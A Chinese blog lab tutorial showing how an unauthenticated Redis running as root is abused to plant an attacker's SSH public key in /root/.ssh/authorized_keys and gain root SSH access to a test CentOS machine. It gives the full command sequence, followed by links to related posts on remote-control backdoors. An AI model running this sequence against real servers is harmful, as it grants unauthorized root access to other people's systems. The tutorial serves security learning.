首先说明一下我们的实验目的,我们这个实验需要利用一种公有密码,将公有密钥写入要攻击的服务器的redis数据库,然后使用我们自己的私钥进行远控肉鸡的操作。

实验环境:centos7(靶机,版本无太大要求,重点是靶机需要开启22端口的ssh服务)

kali(攻击方)

(1)在centos7内安装redis数据库,并以root权限启动redis(安装步骤请参照我写的上一篇 https://www.cnblogs.com/cute-puli/p/10853300.html 

看到饼状图代表redis数据库安装成功

(2)在centos7内开启ssh服务(一般靶机是会将此服务打开的)

在centos的/etc/ssh目录下

输入查询是否安装ssh的命令:

rpm -qa | grep ssh

输入启动ssh的命令:

systemctl restart sshd

输入ssh端口是否监听的命令:

netstat -an | grep 22

能看到22端口已开始监听代表成功开启ssh服务

(3)在靶机的~目录下,创建一个隐藏的.ssh文件夹接收攻击方要传来的公钥值。

mkdir .ssh/

(4)查询是否ssh文件是否已创建好

输入命令:

ls -la

能够看到ssh文件夹的存在

(5)进入攻击方,在攻击方,我们同样需要安装好redis数据库,具体安装流程不再赘述。

上图代表redis已经安装完成

(6)在kali中,我们同样需要创建一个和centos一样的.ssh的文件,但这个.ssh是用来生成密钥的,

在~目录下执行命令:

mkdir .ssh/

ls -la

(7)在kali的这个我们创建的.ssh下产生密钥:

执行语句,提示输入什么时,一直回车就好:

ssh-keygen -t rsa

上图所示代表生成的公有与私有密钥

(8)将公有密钥导入到key.txt中

执行写入语句的操作:

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

这时,在.ssh/目录下出现key.txt代表写入成功,可以使用

cat key.txt

进行查看是否成功。

这是成功的回显效果

(9)将公有密钥导入到靶机中,使用如下命令(在kali进行,我的centos7的IP就是192.168.11.205,kali的IP为192.168.172.129)

注:需要在/src的目录下输入如下命令

cat /root/.ssh/key.txt | ./redis-cli -h 192.168.11.205 -x set xxx

(10)连接靶机(这就是为什么kali也要安装redis的原因)

./redis-cli -h 192.168.11.205

如上图这样,需要在/src的目录下输入命令

(11)向靶机的redis数据库创建一个名为authorized_keys的库,并写入key.txt的操作,写入公有密钥:

config set dir /root/.ssh

config set dbfilename authorized_keys

save

我们能够发现,centos靶机已被写入了公有密钥

(12)在kali使用ssh对靶机进行连接,直接即可远控192.168.11.205靶机

输入:

ssh 192.168.11.205

最后说明:这样,我们就成功远控了centos靶机,这里需要提一点:路径都是可以更换的,当你成功的远控了主机之后,就可以更换路径再次尝试这样的操作,还有,我这里的centos使用的是桥接模式,而kali使用的是nat模式,在做实验时,需要保证,kali能ping通靶机环境,否则无法进行写入公有密钥的操作。

redis使用ssh密钥远控靶机的更多相关文章

  1. Python3实现ICMP远控后门(下)之“Boss”出场

    ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探&qu ...

  2. OSX: SSH密钥使用日记(1)

    大家都知道,一个悠久的历史故事,使用SSH密钥对就可以不用密码登陆远程计算机.经典资料也是不少,不过那些资料对新学者可是有点太不象人话了,不好理解.所以本文试图用更人性一点的语言解释,并演示如何在Ma ...

  3. 2019-9-11:渗透测试,Kill远控软件,初接触

     初步使用Kill远控软件,使win7靶机被远控 该文章仅供学习,利用方法来自网络文章,仅供参考   1,打开运行Kill,选择系统设置,设置监听端口,通讯密码,点击保存设置 2,点击服务生成,上线参 ...

  4. 《Ansible权威指南》笔记(1)——安装,ssh密钥登陆,命令

    2016-12-23 读这本<Ansible权威指南>学习ansible,根据本书内容和网上的各种文档,以及经过自己测试,写出以下笔记.另,这本书内容很好,但印刷错误比较多,作者说第二版会 ...

  5. 多个网站使用不同的SSH密钥登陆(zz)

    多个网站使用不同的SSH密钥登陆   1.创建不同的SSH密钥, -t指定加密方法,RSA或DSA:-C注释:-f指定文件名   www.2cto.com   ssh-keygen -t dsa -C ...

  6. 烂泥:学习ssh之ssh密钥随身携带

    本文由秀依林枫提供友情赞助,首发于烂泥行天下 在上一篇文章<烂泥:学习ssh之ssh无密码登陆>中,我们讲解了如何使用ssh密钥,免密码登陆服务器. 这篇文章我们再来讲解,如何把已经生成的 ...

  7. 添加SSH密钥到GitHub

    $ clip < ~/.ssh/id_rsa.pubbash: /c/Users/UsersName/.ssh/id_rsa.pub: No such file or directory [转] ...

  8. 使用SSH密钥连接Github

    使用Github,也许大家觉得比较麻烦的就是在每次push的时候,都需要输入用户名和密码.如果使用SSH,就可以记住用户名,并创建属于自己 的密码来保证安全操作,还有神奇的一招可以“不用输入密码”哦. ...

  9. [转] SSH 密钥认证机制

    使用 RSA 密钥对进行 SSH 登录验证 使用 RSA 密钥对验证 SSH 的优点是 1) 不用打密码 2) 比密码验证更安全:缺点是 1) 第一次配置的时候有点麻烦 2) 私钥需要小心保存.Any ...

随机推荐

  1. 仿ATM程序软件

    一.目标: ATM仿真软件 1 系统的基本功能 ATM的管理系统其基本功能如下:密码验证机制:吞锁卡机制:存取款功能:账户查询功能:转账功能等. 要求 要能提供以下几个基本功能: (1)系统内的相关信 ...

  2. Codeforces Round #274 (Div. 2) C. Exams (贪心)

    题意:给\(n\)场考试的时间,每场考试可以提前考,但是记录的是原来的考试时间,问你如何安排考试,使得考试的记录时间递增,并且最后一场考试的时间最早. 题解:因为要满足记录的考试时间递增,所以我们用结 ...

  3. AtCoder Beginner Contest 173 D - Chat in a Circle (贪心)

    题意:有一个空环和\(n\)个点,每次可以选择一个点放在空环上,并且获得周围两个点中最小的那个的权值,问能获得的最大的权值是多少? 题解:我们每次都优先放最大的进去,注意每次放的时候都要将这个点放在当 ...

  4. Keywords Search HDU - 2222 AC自动机板子题

    In the modern time, Search engine came into the life of everybody like Google, Baidu, etc. Wiskey al ...

  5. 新闻类爬虫库:Newspaper

    newspaper库是一个主要用来提取新闻内容及分析的Python爬虫框架.此库适合抓取新闻网页.操作简单易学,即使对完全没了解过爬虫的初学者也非常的友好,简单学习就能轻易上手,除此之外,使用过程你不 ...

  6. 牛客网多校第4场 J Hash Function 【思维+并查集建边】

    题目链接:戳这里 学习博客:戳这里 题意: 有n个空位,给一个数x,如果x%n位数空的,就把x放上去,如果不是空的,就看(x+1)%n是不是空的. 现在给一个已经放过数的状态,求放数字的顺序.(要求字 ...

  7. HDU - 5115 Dire Wolf (非原创)

    Dire wolves, also known as Dark wolves, are extraordinarily large and powerful wolves. Many, if not ...

  8. HDU2837 Calculation(指数循环节)题解

    题意: 已知\(f(0)=1,f(n)=(n\%10)^{f(n/10)}\),求\(f(n)\mod m\) 思路: 由扩展欧拉定理可知:当\(b>=m\)时,\(a^b\equiv a^{b ...

  9. MarkDown(文本编译器)

    MarkDown(一种高效的文本编译器) 推荐使用Typora 点击此处下载 使用方法 1. 首先创建一个文本文件xxx.txt. 2. 然后修改文件后缀为xxx.md.(可以记做玛德...) 3. ...

  10. js with All In One

    js with All In One 不推荐,要废弃 function f(x, o) { with (o) { console.log(x); } } function f(foo, values) ...